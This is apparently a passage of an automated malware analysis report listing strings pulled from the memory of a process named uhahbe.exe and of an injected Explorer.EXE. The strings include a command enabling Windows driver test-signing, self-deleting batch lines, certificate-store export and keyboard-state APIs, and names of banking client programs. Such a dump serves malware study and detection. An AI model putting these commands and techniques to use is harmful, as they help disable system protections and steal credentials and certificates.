ON</pre><pre>%s\drivers\%s.sys</pre><pre>\\.\NtSecureSys</pre><pre>ntdll.dll</pre><pre>svchost.exe</pre><pre>EUDC\%d</pre><pre>KeDelayExecutionThread</pre><pre>WinExec</pre><pre>KERNEL32.dll</pre><pre>ExitWindowsEx</pre><pre>USER32.dll</pre><pre>GDI32.dll</pre><pre>RegCloseKey</pre><pre>RegFlushKey</pre><pre>RegCreateKeyExA</pre><pre>ADVAPI32.dll</pre><pre>ShellExecuteA</pre><pre>SHELL32.dll</pre><pre>msvcrt.dll</pre><b>uhahbe.exe_1760_rwx_00BE0000_0006E000:</b><pre>.text</pre><pre>`.data</pre><pre>.idata</pre><pre>@.reloc</pre><pre>PSSSSSSh</pre><pre>bcdedit.exe -set TESTSIGNING ON</pre><pre>%s\drivers\%s.sys</pre><pre>\\.\NtSecureSys</pre><pre>ntdll.dll</pre><pre>svchost.exe</pre><pre>EUDC\%d</pre><pre>KeDelayExecutionThread</pre><pre>WinExec</pre><pre>KERNEL32.dll</pre><pre>ExitWindowsEx</pre><pre>USER32.dll</pre><pre>GDI32.dll</pre><pre>RegCloseKey</pre><pre>RegFlushKey</pre><pre>RegCreateKeyExA</pre><pre>ADVAPI32.dll</pre><pre>ShellExecuteA</pre><pre>SHELL32.dll</pre><pre>msvcrt.dll</pre><pre>Invalid parameter passed to C runtime function.</pre><pre>0123456789</pre><pre>:$:,:4:<</pre><pre>cRt.1</pre><pre>@[.cZ</pre><pre>http://www.google.com/</pre><pre>http://www.bing.com/</pre><pre>REPORT</pre><pre>bcdfghjklmnpqrstvwxzRegDeleteKeyExW</pre><pre>HTTP/1.1</pre><pre>userenv.dll</pre><pre>del "%s"</pre><pre>if exist "%s" goto d</pre><pre>del /F "%s"</pre><pre>gdiplus.dll</pre><pre>GdiplusShutdown</pre><pre>%3<8645=</pre><pre>7! *.gagZce{(#--2{}s %%;wdX</pre><pre>6019>6*//</pre><pre>0*18 2$4</pre><pre>! <47.ggt?45</pre><pre>L$Â$</pre><pre>w%fkN</pre><pre>m9.td</pre><pre>t.Ht$HHt</pre><pre>zcÁ</pre><pre>GetKeyboardState</pre><pre>MsgWaitForMultipleObjects</pre><pre>RegCreateKeyExW</pre><pre>RegQueryInfoKeyW</pre><pre>RegDeleteKeyW</pre><pre>RegOpenKeyExW</pre><pre>RegEnumKeyExW</pre><pre>CryptGetKeyParam</pre><pre>CryptImportKey</pre><pre>CryptDestroyKey</pre><pre>PathIsURLW</pre><pre>UrlUnescapeA</pre><pre>SHLWAPI.dll</pre><pre>ShellExecuteW</pre><pre>Secur32.dll</pre><pre>ole32.dll</pre><pre>WS2_32.dll</pre><pre>CertDeleteCertificateFromStore</pre><pre>CertOpenSystemStoreW</pre><pre>CertCloseStore</pre><pre>CertEnumCertificatesInStore</pre><pre>CertDuplicateCertificateContext</pre><pre>PFXExportCertStoreEx</pre><pre>PFXImportCertStore</pre><pre>CRYPT32.dll</pre><pre>HttpSendRequestExA</pre><pre>HttpQueryInfoA</pre><pre>InternetCrackUrlA</pre><pre>HttpOpenRequestA</pre><pre>HttpEndRequestA</pre><pre>HttpAddRequestHeadersA</pre><pre>WININET.dll</pre><pre>OLEAUT32.dll</pre><pre>NETAPI32.dll</pre><pre>IPHLPAPI.DLL</pre><pre>VERSION.dll</pre><pre>6f6F6S6b6l6</pre><pre>2#3(3]3{3</pre><pre>0 0,000<0@0\0`0</pre><pre>urlmon.dll</pre><pre>kernel32.dll</pre><pre>\StringFileInfo\xx\%s</pre><pre>Wadvapi32.dll</pre><pre>cabinet.dll</pre><pre>rapport</pre><pre>SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\%s</pre><pre>launchpadshell.exe</pre><pre>dirclt32.exe</pre><pre>wtng.exe</pre><pre>prologue.exe</pre><pre>pcsws.exe</pre><pre>fdmaster.exe</pre><pre>"%s" %s</pre><pre>/c "%s"</pre><pre>shell32.dll</pre><pre>%Documents and Settings%\%current user%\Local Settings\Temp</pre><pre>%Documents and Settings%\%current user%\Local Settings\Application Data</pre><pre>Global\{01E22063-0823-4088-6532-C4CE7D78E7DC}</pre><b>Explorer.EXE_1948_rwx_02470000_0006E000:</b><pre>.text</pre><pre>`.data</pre><pre>.idata</pre><pre>@.reloc</pre><pre>PSSSSSSh</pre><pre>bcdedit.exe -set TESTSIGNING ON</pre><pre>%s\drivers\%s.sys</pre><pre>\\.\NtSecureSys</pre><pre>ntdll.dll</pre><pre>svchost.exe</pre><pre>EUDC\%d</pre><pre>KeDelayExecutionThread</pre><pre>WinExec</pre><pre>KERNEL32.dll</pre><pre>ExitWindowsEx</pre><pre>USER32.dll</pre><pre>GDI32.dll</pre><pre>RegCloseKey</pre><pre>RegFlushKey</pre><pre>RegCreateKeyExA</pre><pre>ADVAPI32.dll</pre><pre>ShellExecuteA</pre><pre>SHELL32.dll</pre><pre>msvcrt.dll</pre><pre>Invalid parameter passed to C runtime function.</pre><pre>0123456789</pre><pre>:$:,:4:<</pre><pre>cRt.1</pre><pre>@[.cZ</pre><pre>http://www.google.com/</pre><pre>http://www.bing.com/</pre><pre>REPORT</pre><pre>bcdfghjklmnpqrstvwxzRegDeleteKeyExW</pre><pre>HTTP/1.1</pre><pre>userenv.dll</pre><pre>del "%s"</pre><pre>if exist "%s" goto d</pre><pre>del /F "%s"</pre><pre>gdiplus.dll</pre><pre>GdiplusShutdown</pre><pre>%3<8645=</pre><pre>7! *.gagZce{(#--2{}s %%;wdX</pre><pre>6019>6*//</pre><pre>0*18 2$4</pre><pre>! <47.ggt?45</pre><pre>L$Â$</pre><pre>w%fkN</pre><pre>m9.td</pre><pre>t.Ht$HHt</pre><pre>zcÁ</pre><pre>GetKeyboardState</pre><pre>MsgWaitForMultipleObjects</pre><pre>RegCreateKeyExW</pre><pre>RegQueryInfoKeyW</pre><pre>RegDeleteKeyW</pre><pre>RegOpenKeyExW</pre><pre>RegEnumKeyExW</pre><pre>CryptGetKeyParam</pre><pre>CryptImportKey</pre><pre>CryptDestroyKey</pre><pre>PathIsURLW</pre><pre>UrlUnescapeA</pre><pre>SHLWAPI.dll</pre><pre>ShellExecuteW</pre><pre>Secur32.dll</pre><pre>ole32.dll</pre><pre>WS2_32.dll</pre><pre>CertDeleteCertificateFromStore</pre><pre>CertOpenSystemStoreW</pre><pre>CertCloseStore</pre><pre>CertEnumCertificatesInStore</pre><pre>CertDuplicateCertificateContext</pre><pre>PFXExportCertStoreEx</pre><pre>PFXImportCertStore</pre><pre>CRYPT32.dll</pre><pre>HttpSendRequestExA</pre><pre>HttpQueryInfoA</pre><pre>InternetCrackUrlA</pre><pre>HttpOpenRequestA</pre><pre>HttpEndRequestA</pre><pre>HttpAddRequestHeadersA</pre><pre>WININET.dll</pre><pre>OLEAUT32.dll</pre><pre>NETAPI32.dll</pre><pre>IPHLPAPI.DLL</pre><pre>VERSION.dll</pre><pre>6f6F6S6b6l6</pre><pre>2#3(3]3{3</pre><pre>0 0,000<0@0\0`0</pre><pre>urlmon.dll</pre><pre>kernel32.dll</pre><pre>\StringFileInfo\xx\%s</pre><pre>Wadvapi32.dll</pre><pre>cabinet.dll</pre><pre>rapport</pre><pre>SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\%s</pre><pre>launchpadshell.exe</pre><pre>dirclt32.exe</pre><pre>wtng.exe</pre><pre>prologue.exe</pre><pre>pcsws.exe</pre><pre>fdmaster.exe</pre><pre>"%s" %s</pre><pre>/c "%s"</pre><pre>shell32.dll</pre><pre>%Documents and Settings%\%current user%\Local Settings\Temp</pre><pre>%Documents and Settings%\%current user%\Local Settings\Application Data</pre><pre>Global\{01E22063-0823-4088-6532-C4CE7D78E7DC}</pre></pre></pre></pre>